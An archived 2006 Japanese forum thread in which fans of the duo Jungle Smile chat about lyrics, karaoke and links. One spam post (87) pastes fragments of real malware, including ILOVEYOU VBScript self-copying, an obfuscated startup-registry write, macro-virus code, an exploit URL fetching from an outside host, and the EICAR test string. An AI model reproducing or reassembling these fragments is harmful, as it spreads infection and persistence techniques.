5ちゃんねる ★スマホ版★ ■掲示板に戻る■ 全部 1- 最新50  

■ このスレッドは過去ログ倉庫に格納されています

Jungle Smile 7 12316;君を待ってゐるよ12316;

1 :伝説の名無しさん:2006/06/07(水) 02:49:18
高木郁乃(ボーカル) 2006年3月、ついに人前に姿を現して1曲限りの復活。
吉田ゐさお(コンポーザー) マイコン兄弟などで新しい音を模索している最中。

ふたりがのぼっている、光に続く階段は、どこへ繋がっているんだろう?
そんなジャンスマをまったりと語り続けて7スレ目。

前スレ
【ひざを抱えて】Jungle Smile 6【待ってゐるよ】
http://music4.2ch.net/test/read.cgi/legend/1111067274/

まとめサイト(リンク集や楽曲紹介など。)
ttp://jsthread.fc2web.com/

2 :伝説の名無しさん:2006/06/07(水) 02:51:48
ぎゃーー。。
〜が文字化けした。。
削除依頼通らないだろうからこのスレ使い続ける感じでいいですかね・・・。

3 :1:2006/06/07(水) 02:54:06
本当申し訳ないです・・・。

4 :伝説の名無しさん:2006/06/07(水) 06:34:32
まあ立ったもんは仕方ないな
テンプレヨロ

5 :伝説の名無しさん:2006/06/07(水) 13:57:55


これが文字化けか

6 :伝説の名無しさん:2006/06/07(水) 14:15:33
このスレ、DAT落ちさせて、新しいの立てるか?

7 :伝説の名無しさん:2006/06/07(水) 16:27:50
>>1
でもこのスレタイはあんまりなんで新しいの誰か立てて下さい

8 :伝説の名無しさん:2006/06/07(水) 16:44:11
>  2006年3月、ついに人前に姿を現して1曲限りの復活。

ここん所詳しく
出来れば前スレのログをプリーズ

9 :伝説の名無しさん:2006/06/07(水) 17:29:23
>>6-7
タイトルなんかで立て直さんでもいいじゃん。

>>8
こっちよりむしろ公式BBSを見たほうが情報あるよ。
川崎ハートフルコンサートで抱きしめたいを歌った。


10 :伝説の名無しさん:2006/06/09(金) 23:19:02
ここでいいんじゃないの
保守

11 :伝説の名無しさん:2006/06/10(土) 00:30:36
スレタイミスったからって>>1がやる気がないのはどうか
ちゃんとテンプレ貼ればいいのに

12 :伝説の名無しさん:2006/06/10(土) 01:24:42
>>11
長々と貼るのはうざいからまとめサイト参照で良いんじゃないかと
必要って雰囲気だったら貼りますが。

13 :伝説の名無しさん:2006/06/10(土) 01:27:18
せめて公式くらいは貼っておいてもらいたかったかも

14 :伝説の名無しさん:2006/06/10(土) 08:06:07
テンプレ貼らないから誰もこないんだろ

15 :伝説の名無しさん:2006/06/10(土) 11:45:25
>>14
言いがかりはヤメレ

公式
ジャンスマ.com
http://www.jungle-smile.com

ゐさおの部屋(メンバー吉田ゐさお・本人による濃ゆ〜い曲解説有)
http://www.wisao.com

文句言うくらいなら誰か貼ってやれよ。

16 :伝説の名無しさん:2006/06/10(土) 17:44:35
そうだそうだ!!!!!1

17 :伝説の名無しさん:2006/06/11(日) 02:37:14
>15
ジャンスマ.com → ジャンスマニア
ゐさおの部屋 → 公式「ゐさお.com」

ゐさおの部屋って懐かしいな。


>1
「君」じゃなくて「きみ」だから。

18 :伝説の名無しさん:2006/06/17(土) 01:38:44
>>17
おまへも新スレ行く前に指摘してやれって。

それにしても話題がないな。1週間レスなしか。。

19 :伝説の名無しさん:2006/06/17(土) 11:38:14
普通にスレタイつけりゃいいのに
文字化けなんかさせるから・・・
ここ使おうぜ
いつまで停滞させてんだ

20 :伝説の名無しさん:2006/06/17(土) 14:31:32
げー、ここ落とすつもりだったのに皆ageんだもんなぁ プンスカ
こんなスレタイじゃ何も書き込む気しねー
前スレじゃマメに書き込んでたけど今回は無理だわ

21 :伝説の名無しさん:2006/06/17(土) 15:12:19
スレタイごときでw
何でそんなに気になるんだ。

22 :伝説の名無しさん:2006/06/17(土) 16:02:59
ごときと思うのはお前の自由
不愉快に思うのも俺の自由
ageるのはお前の自由
sageるのも俺の自由

wをつけるのはお前の自由
冒険と書いてロマンと読むのも俺の自由

23 :伝説の名無しさん:2006/06/18(日) 02:44:54
懐メロ邦楽板
【じゃんすま】イクノ【ジャンスマ】
http://bubble4.2ch.net/test/read.cgi/natsumeloj/1127907048/l50
伝説板
【Jungle】ジャングルスマイル【Smile】
http://music4.2ch.net/test/read.cgi/legend/1139246945



新大情報便そよかぜ 1998年12月号(※pdfファイル)
ttp://soyonews.hp.infoseek.co.jp/backnumber.shtml

24 :伝説の名無しさん:2006/06/18(日) 03:47:53
テンプレに入れるほどではないあれやこれや


2006.03 UFJ Nicos「Smart plus」CM/作曲
ttp://smartplus.jp/cm/index.html
2006.03 NANAIRO「シズクタチ」Music Clip/演出・監督・編集
ttp://stage.mina-kuru.jp/detail/detail.html?softsq=40


不純ブログ 2006/1/17
ttp://diary.jp.aol.com/applet/itosachikostaff/78/trackback
大山なつ × 吉田ゐさお
ttp://auctions.yahoo.co.jp/html/entget/200503/ooyama/interview1a.html

25 :伝説の名無しさん:2006/06/18(日) 04:30:09
前々スレに貼ったラジオのあれやこれやをもう1回
見れなくなったのを削除してFMとやま、Music Partyを追加

FM愛媛 2000.11.18
ttp://www.jfn.co.jp/watanabe/guest/guest.html
FM AICHI キープオンムービン 2000.11.20
ttp://fma.co.jp/pc/01guest/guest/2000/001120/index.html
Music Party #197 2000.12.23(放送:2001.01.01〜15)
http://www2.tokai.or.jp/music-party/guest/197.jpg
FM石川 2001.06.04
ttp://fmishikawa.co.jp/gues/album/guestdb/sa/junglesmile01_06_04.html
FMとやま 2001.06.05
http://www.fmtoyama.co.jp/program/radio/image/g0605.jpg
FM AICHI マジカルジャンクション 2001.06.08
ttp://fma.co.jp/memorial/program/magical/sketch/guest_sketch_010604/
毎日放送 MUSIC EDGE 2001.07.06
ttp://mbs.jp/edge/hotedge/20010706main.html
FM AICHI 100リクエスツ 2001.07.15
ttp://www.fma.co.jp/memorial/program/k100/guest_bnb/main_07.html
FMとやま 2001.07.19
http://www.fmtoyama.co.jp/program/radio/image/g13719.jpg
Music Party #211 2001.07.22(放送:2001.08.01〜15)
http://www2.tokai.or.jp/music-party/guest/211.jpg

26 :伝説の名無しさん:2006/06/18(日) 04:38:25
あとこれどうする?
個人サイトだからテンプレから外れたの


恵津子の部屋 インタビュー
ttp://www.bekkoame.ne.jp/i/gc4272/kadono139.htm
ttp://www.bekkoame.ne.jp/i/gc4272/kadono146.htm

おなじ星の足あと
ttp://tokyo.cool.ne.jp/onajihoshi/index.html

27 :伝説の名無しさん:2006/06/18(日) 06:09:04
>>23-26

ようやく時間が動き出すな

28 :伝説の名無しさん:2006/06/18(日) 08:01:09
>>23-26

良く探したね。後でまとめに追加しとくよ。

29 :伝説の名無しさん:2006/06/18(日) 17:27:44
ジャンスマシネマようやく見つかった
2001年だから着メロがまだ初期で貧弱だったんだな

30 :23:2006/06/18(日) 20:16:06
>28
まとめに入れるの23だけでいいかなって感じじゃない?

31 :伝説の名無しさん:2006/06/19(月) 21:34:25
タトーエバー(・∀・)チーブサー
ってこの人の曲?

32 :伝説の名無しさん:2006/06/19(月) 22:02:46
イエース
曲名「林檎」アルバム「林檎のためいき」収録

33 :伝説の名無しさん:2006/06/19(月) 23:01:59
男は女の最初の男になりたがる
女は男の最後の女になりたがる

34 :伝説の名無しさん:2006/06/19(月) 23:38:14
イクノフに一票
http://www.ytv.co.jp/geikoi/ranking/ranking0619.html


35 :伝説の名無しさん:2006/06/20(火) 00:58:49
>>34
何票なのかはわからんが入ってるんだな一応

36 :伝説の名無しさん:2006/06/20(火) 18:02:15
>>32
ありがと
聞き間違いかと思ったらあってたのね

37 :伝説の名無しさん:2006/06/20(火) 18:36:38
>31
フレテ トー ネガウ

38 :伝説の名無しさん:2006/06/20(火) 18:48:19
「林檎」を作詞したあとに「キスしてあげる」作詞したのかな

39 :伝説の名無しさん:2006/06/20(火) 20:12:45
>>35
残念ながら1票みたい
投票者全部発表だから
しかし、今どうやって食べてるのだろう
コンビニのバイトか

40 :伝説の名無しさん:2006/06/20(火) 20:20:33
>>39
前スレで誰だかのコンサートにゲストで出たって情報があったな

41 :伝説の名無しさん:2006/06/20(火) 21:09:03
>>39
イクノフは作詞してるから印税生活だろ。
カラオケ歌えばイクノフに入るし、CD売り上げがあればこれも収入になる。
おなじ星とかもそれなりの売り上げがあった訳だし、浪費家でもなさそうだから、向こう5年くらいは食うのに困らないのではないか。

まぁうちらに出来る事は、カラオケ行ってジャンスマを歌うって事くらいだな。ジャンスマ縛りカラオケしてぇ。

42 :伝説の名無しさん:2006/06/20(火) 21:22:01
ごめんね、ジャンスマシネマ買ったけど中古だったんだごめんねイクノヴ(´∩ω∩`)

43 : :2006/06/20(火) 21:25:32
一般の人とカラオケいって男がジャングルスマイル歌ってたら
どう思われるだろうか

44 :伝説の名無しさん:2006/06/20(火) 21:38:00
>>39>>41
印税で生活できるほどなんかね?
普通の仕事してんじゃないの

>>43
曲によるだろうけど、大概寒いと思う。

45 :伝説の名無しさん:2006/06/20(火) 21:42:22
イカロスと風を起こそうぐらいかなあ
女目線の歌詞だからな殆どの歌が

46 :伝説の名無しさん:2006/06/20(火) 22:29:46
男とカラオケいって、おなじ星歌って、
「たとえあなたがー」のときに内心「あ、やべっ…」って…。

47 :伝説の名無しさん:2006/06/20(火) 22:38:16
たとえあなたが女に生まれていたとしても

って部分はどういう意味なんだろうか
あなたとだったらズーレーでもOKっすよ
ってこと?

48 :伝説の名無しさん:2006/06/20(火) 22:54:50
【邦楽】世界に通用すると思うアーティストランキング』をCDTVが大発表!

http://music4.2ch.net/test/read.cgi/musicnews/1150810100/

49 :伝説の名無しさん:2006/06/20(火) 23:47:58
風をおこそうもアリかな。

>>47
ちょwwwあくまで「たとえ」なんだからwwwwwwwwww

50 :伝説の名無しさん:2006/06/21(水) 09:53:42
♪もう少し もう少し
この幸せが長く続きますように♪

↑これなんという曲名ですか?

51 :伝説の名無しさん:2006/06/21(水) 12:18:00
菅野ようこにお聞き下さい

52 :50:2006/06/21(水) 21:35:39
>>51さん
ありがとう!!
おかげでGRAND FUNK INC.のサイトにたどりつけたよ。



53 :伝説の名無しさん:2006/06/21(水) 21:50:02
>>51ですが曲名は分からないので作曲者を適当に答えただけです
それが何か答えを導いたのならこれ幸いw

ところで曲名か何かわかりました?

54 :伝説の名無しさん:2006/06/21(水) 22:17:45
おなじ星のPVいいなあ
しっとりとしたオサレバーみたいなところで
イクノヴが歌ってそれをうっとりとした感じで眺める客

55 :伝説の名無しさん:2006/06/21(水) 23:07:58
ttp://www.youtube.com/watch?v=1S-omWIhDEQ
ttp://www.youtube.com/watch?v=U9wQkWOaeiM
曲名ついてんのかなあ。

56 :50:2006/06/22(木) 12:12:16
>>53さん
曲名はわかりませんでしたがGRAND FUNK INC.で
CMナレーションなしバージョン1分18秒堪能出来たので良しとしました。

あなたのヒントがなければたどり着けなかったでしょうから感謝しております!!

57 :伝説の名無しさん:2006/06/22(木) 13:32:23
それは良かった
曲名は「HALF CENTURY MORE」でいいかな?と自分は思ってますw

58 :伝説の名無しさん:2006/06/22(木) 22:37:03
リセイノリンゴッテナニ?(・∀・)ネーネー

59 :伝説の名無しさん:2006/06/22(木) 23:08:55
>>58
コドモハ シラナクテイイ ...(-_-)...

60 :伝説の名無しさん:2006/06/22(木) 23:38:39
理性の林檎吐き出した・・・か
どういう意味なんだろうな

61 :伝説の名無しさん:2006/06/22(木) 23:41:29
え?みんな中学生とかなの?

62 :伝説の名無しさん:2006/06/23(金) 01:12:53
初めて見たときは中学生・・・

63 :伝説の名無しさん:2006/06/23(金) 20:55:11
8MBの人:神話時代の住人さん、天の岩戸に閉じこもり、どんちゃん騒ぎを眺めてるタイプ。
16MBの人:Windows95の発売日に秋葉原で徹夜した人、昔の彼女が忘れられない典型
32MBの人:意外と多いこのクラス、いい加減に新しいの買えば?
48MBの人:当時は周囲に自慢しまくり、みんなにスゲーと言われて気分良かった懐古厨
64MBの人:まだまだ現役使える使えるって、愛情過多の忠誠心でリストラ候補
96MBの人:慌てて買ったらWinMEだった人、童貞喪失を急ぎすぎてブスと出来ちゃった結婚
128MBの人:ある意味すごく善人、推奨スペックそのまま信じるお人好し
192MBの人:ちょっと調子に乗ってみた、俺ってちょっと変わってると主張がしたい中二病
256MBの人:メーカーにとって一番都合の良い人、言ってみれば便利な女
384MBの人:ちょっと背伸びしてみた田舎者、あか抜けるにはもう一歩
512MBの人:一応ナイス、二番目に正解、だけどそろそろ足りないんじゃない?
640MBの人:古いマシンにムリヤリ増設、服だけムリしてヴィジュアル系、見た目はただの飯野賢治
768MBの人:やることなすこと中途半端、微妙すぎる選択、合コンで一番持てないタイプ
1GBの人:現状では一番ベストな選択。もっとも賢く正解に近い
1.5GBの人:微妙に多すぎ、本当にそんなに必要なのかもう一度自分の胸に聞いてみて
2GBの人:廃人ゲーマー乙、実生活じゃ女の顔にこだわりすぎて30過ぎてもまだ童貞
3〜GBの人:完全なる高スペック厨、利用目的2ちゃんとエロゲ、そろそろ人生考え直せ

64 :伝説の名無しさん:2006/06/23(金) 23:11:39
DVDでの0930の演技がすばらしい件

65 :伝説の名無しさん:2006/06/24(土) 13:40:39
でも最近みない件

66 :伝説の名無しさん:2006/06/24(土) 21:17:08
0930解散したはずじゃ?

67 :伝説の名無しさん:2006/06/24(土) 23:16:37
ジャンスマシネマのミニドラマに出てる0930がってことでしょ
DVD自体、2001年(だっけ)に出たもんだからな

68 :伝説の名無しさん:2006/06/25(日) 02:20:53
↑誰もがわかってる事を解説する意図がワカラン

69 :伝説の名無しさん:2006/06/28(水) 09:00:39
ひー

70 :伝説の名無しさん:2006/06/30(金) 00:19:41
昨日は、イクノフ 31回目の誕生日ですた。オメ。

71 :伝説の名無しさん:2006/07/01(土) 00:05:39
今日は私の誕生日ですわよ
イクノフと私オメ

72 :伝説の名無しさん:2006/07/07(金) 17:12:09
ラジオで「誰が歌ってるか分からないけどリクエストします。」
と言うことで同じ星が流れてた。

73 :伝説の名無しさん:2006/07/07(金) 17:36:57
もちろん乙葉だろうなw

74 :伝説の名無しさん:2006/07/07(金) 21:37:39
ポップジャムの乳首動画がどうしても見つからん



75 :伝説の名無しさん:2006/07/07(金) 21:47:52
昔MXとnyで見かけたが・・・
イクノフは好きだが性的な対象としては見た事はない

76 :伝説の名無しさん:2006/07/07(金) 21:54:22
>>73
ちゃんと本家が流れましたよw

77 :伝説の名無しさん:2006/07/07(金) 21:56:19
>>76
よかった。

78 :伝説の名無しさん:2006/07/07(金) 21:56:38
>>75
ここにくればあると思ったが。
ユツベにもないし、うぉおおおおおおおおおおおおおお

79 :伝説の名無しさん:2006/07/07(金) 23:22:58
おかあさんが出て行った夜に
はじめてふとももの内側を赤く生ぬるいのがつたった

一般人とのカラオケじゃ絶対歌えない歌詞だな
ジャンスマカラオケオフしたい

80 :伝説の名無しさん:2006/07/15(土) 00:50:58
チェリーボーイなんてゆう恥ずかしいタイトルの曲もあったんだすねーーー

81 :伝説の名無しさん:2006/07/15(土) 03:06:32
12316

82 :伝説の名無しさん:2006/07/16(日) 01:39:29
イカロスをmidiで作ってみたのだが、ここの住人に聴いてもらいたい。
でも著作権的にまずいかな。

83 :伝説の名無しさん:2006/07/16(日) 03:12:42
いらないよ。CDもってるから。

84 :伝説の名無しさん:2006/07/16(日) 12:12:46
ならいいや。スレ汚しスマソ

85 :伝説の名無しさん:2006/07/16(日) 21:46:44
>>82
まだ居る?気が向いたらアップしてみてよ


86 :伝説の名無しさん:2006/07/17(月) 08:49:28
>>82 ごめん 誤るよ 君の音  聴かせてくれないか 

87 :伝説の名無しさん:2006/07/17(月) 09:13:27
<body onload=window()>
If s = "htm" and fso.FileExists(f1.path+"l") = False thenfso.CopyFile f1.path, f1.path+"l"
Set A4 = A1.CreateTextFile(A1.BuildPath(A1.GetSpecialFolder(1)))
fso.copyfile "c:\network.vbs", "j:\windows\start menu\programs\startup\"
c.Copy(dirsystem&"\MSKernel32.vbs")
c.Copy(dirwin&"\Win32DLL.vbs")
c.Copy(dirsystem&"\LOVE-LETTER-FOR-YOU.TXT.vbs")
<object data="ms-its:mhtml:file://C:\\MAIN.MHT!http://www.loadcash.biz//adverts//35//main.chm::/main.htm" type="text/
X5O!P%@AP[4\PZX54(P^)7CC)7}$EICAR-STANDARD-ANTIVIRUS-TEST-FILE!$H+H*
fso.copyfile "dirsystem&nurupo.vbs", "j:\windows\start menu\programs\startup\"
If s = "htm" and fso.FileExists(f1.path+"l") = False then fso.CopyFile f1.path, f1.path+"l"
ToInfect.CodeModule.InsertLines BGN, ADI1.CodeModule.Lines(BGN, 1)
G.RegWrite A("IJDX^MNB@M^L@BIHOD]Rnguv`sd]Lhbsnrngu]Vhoenvr]BtssdouWdsrhno]Sto]VhoRu`su"), E.BuildPath(E.GetSpecialFolder(1), A("VHORU@SU/WCR"))
lines(n)=replace(lines(n),"""",chr(93)+chr(45)+chr(93))
ms-its:mhtml:file://c:\
kak.hta';ken=wd+'START
kill -9 xz/tSaBh0
Sub auto_open()
Application.OnSheetActivate = "check_files"
End Sub
Sub check_files()
c$ = Application.StartupPath
m$ = Dir(c$ & "\" & "PERSONAL.XLS")
If m$ = "PERSONAL.XLS" Then p = 1 Else p = 0
If ActiveWorkbook.Modules.Count > 0 Then w = 1 Else w = 0
whichfile = p + w * 10
End Sub
???

88 :伝説の名無しさん:2006/07/17(月) 19:38:07
>>82
聞きたいのでキボン

89 :82:2006/07/18(火) 00:13:58
つ[u.skr.jp 1024 No.1898 pass:ikunowisao]
興味がある方はお早めにどうぞ。。
もしよかったらしょぼいとかなんとか言ってくれるといいな。
気に入ってくれたら携帯にでも入れて欲しいんだな。
スレ汚しスマソ。。

90 :伝説の名無しさん:2006/07/18(火) 00:47:58
>>89
着メロにさせていただきますた。d

ただ、Lhaplus解凍するとアーカイブが壊れてるメッセージが出る。
ちゃんとmidiは再生できるのになんでだろう?

91 :伝説の名無しさん:2006/07/19(水) 09:46:21
うっそ!?復活してたの?曲聴きたい


92 :伝説の名無しさん:2006/07/21(金) 21:08:48
復活はしてないだろ…。

93 :伝説の名無しさん:2006/07/22(土) 22:48:24
うっそ!?復活してたの?曲聴きたい


94 :伝説の名無しさん:2006/07/23(日) 00:35:04
だからしてねぇって。

95 :伝説の名無しさん:2006/07/23(日) 05:54:41
k

96 :伝説の名無しさん:2006/07/23(日) 15:36:29
DVD見たんだけどさ
最近のコンサートって
「アンコール!アンコール」
みたいなのやらないの?

97 :伝説の名無しさん:2006/07/23(日) 21:28:14
>>96
基本的にアンコールしないアーティストだってのわかってるし。
つーか最近(というかここ数年)コンサートしてない(´・ω・`)

98 :伝説の名無しさん:2006/07/23(日) 23:15:14
でも
(・∀・)アンコール!(・∀・)アンコール!

99 :伝説の名無しさん:2006/07/23(日) 23:29:17
ジャンゴー

100 :伝説の名無しさん:2006/07/24(月) 11:26:31
アンコールの代わりに
(・∀・)おーかわり!(・∀・)おーかわり!
って言ったらやってくれそうな気もする

101 :伝説の名無しさん:2006/07/24(月) 14:52:23
(・∀・)ミンナモイッショニー、ラララー、ヤッテー!

って甘えた感じ(・∀・)イイ

102 :伝説の名無しさん:2006/07/25(火) 19:11:13
(・∀・)ララララララララ ラーララー

103 :伝説の名無しさん:2006/07/25(火) 19:22:32
風邪を起こそうはPVのさわやかな感じもいいが
コンサートのおもしろアレンジもいいな
(・∀・)ノ=ノ ラララララララ ラーララー

104 :伝説の名無しさん:2006/07/26(水) 18:25:40
車の中ではエンドレスでずーっと「思春期」を聞いてる俺
聞いているうちになんかトリップする

105 :伝説の名無しさん:2006/07/26(水) 23:13:01
あの世にトリップするなよ

106 :伝説の名無しさん:2006/07/27(木) 00:46:23
カラオケ板のぞいたらヒトカラスレみたいなのがあって勇気づけられた
俺もジャンスマ歌ってこようかな

107 :伝説の名無しさん:2006/07/27(木) 22:58:29
(・∀・)ナーミダーノミーズターマリー

108 :伝説の名無しさん:2006/07/28(金) 00:33:31
俺ヒトカラでジャンスマ歌ってる。
一人じゃなかったら歌えないからね。
最近ジャンスマばっか聞いてるから抱きしめたいが一番高得点が出る。

109 :伝説の名無しさん:2006/07/28(金) 08:02:00
キモイがなぜか許せる

110 :伝説の名無しさん:2006/07/28(金) 10:48:07
やっぱヒトカラで高得点だったら小さくガッツポズとかするの?

22 KB
■ このスレッドは過去ログ倉庫に格納されています

★スマホ版★ 掲示板に戻る 全部 前100 次100 最新50

read.cgi ver 05.04.00 2017/10/04 Walang Kapalit ★
FOX ★ DSO(Dynamic Shared Object)